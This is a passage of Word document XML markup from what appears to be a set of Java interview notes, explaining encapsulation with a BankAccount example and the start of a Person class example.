          <w:numId w:val="59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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>focus on what an object does</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not how it does it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08837A4B" w14:textId="2864479B" w:rsidR="00B729A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B729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2623042F">
          <v:rect id="_x0000_i1313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA6FF9" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc196307592"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Encapsulation? Explain with a real time example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="30A695F3" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encapsulation is one of the fundamental OOPs principles in Java. It refers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapping data (variables) and the code (methods) that operates on the data into a single unit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — typically a class. It helps protect the internal state of an object from unwanted external modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D353BD" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Encapsulation is achieved using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23401F93" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Private fields to restrict direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0820CB" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Public getters and setters to allow controlled access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF0D26" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: Bank Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300838F5"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BankAccou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67DD3CA"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> balan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ivate field — can't be accessed directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432BC7B"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09759B32"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BankAccoun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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> initialBalan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FCF7ED7"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balanc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nitialBalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641E85A"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97BB46A"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C519AD"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ublic method to get balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976F383"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getBalan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368D77B"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balance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F834B"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BFCA684"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D00BA"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ublic method to deposit money (with validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61B345"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deposi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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> amou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1270D6B"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amount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23ABA48"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            balanc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mount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12093207"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5D0F02B"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B9A48E2"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EAE6D6"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ublic method to withdraw money (with validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A66653"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withdraw</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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> amou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8B05C0A"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amount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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> balanc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amou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0C7B5F7"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            balanc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mount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C7F65"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6D04E83"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060C525" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="008221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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA88658" w14:textId="77777777" w:rsidR="00822151" w:rsidRPr="00CE4B95" w:rsidRDefault="00822151" w:rsidP="00822151">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B77CFD8" w14:textId="7AA8FAC0" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D5C2B" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The balance variable is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it's private.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4475E17F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access is provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only through public methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (getBalance, deposit, withdraw), ensuring that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795892FC" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The balance can't be set to a negative value directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BC32F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deposits and withdrawals go through validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC78D9" w14:textId="455AE3E8" w:rsidR="00B729A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This prevents incorrect or unauthorized changes to the data, which is the essence of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in real-world applications.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6AED9799">
          <v:rect id="_x0000_i1314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D45C9" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc196307593"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do we achieve encapsulation in Java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="5DEAE78A" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Encapsulation is one of the four fundamental OOP concepts in Java. It refers to bundling data (variables) and methods that operate on that data into a single unit (class) while restricting direct access to some of the object's components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C189D4" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Ways to Achieve Encapsulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D144AE" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Using Private Access Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5544D007" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Make class fields private to prevent direct access from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED9075"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Person</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73CBB244"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nam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private field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882CBC5"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD02226"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB06FC" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D07E310" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
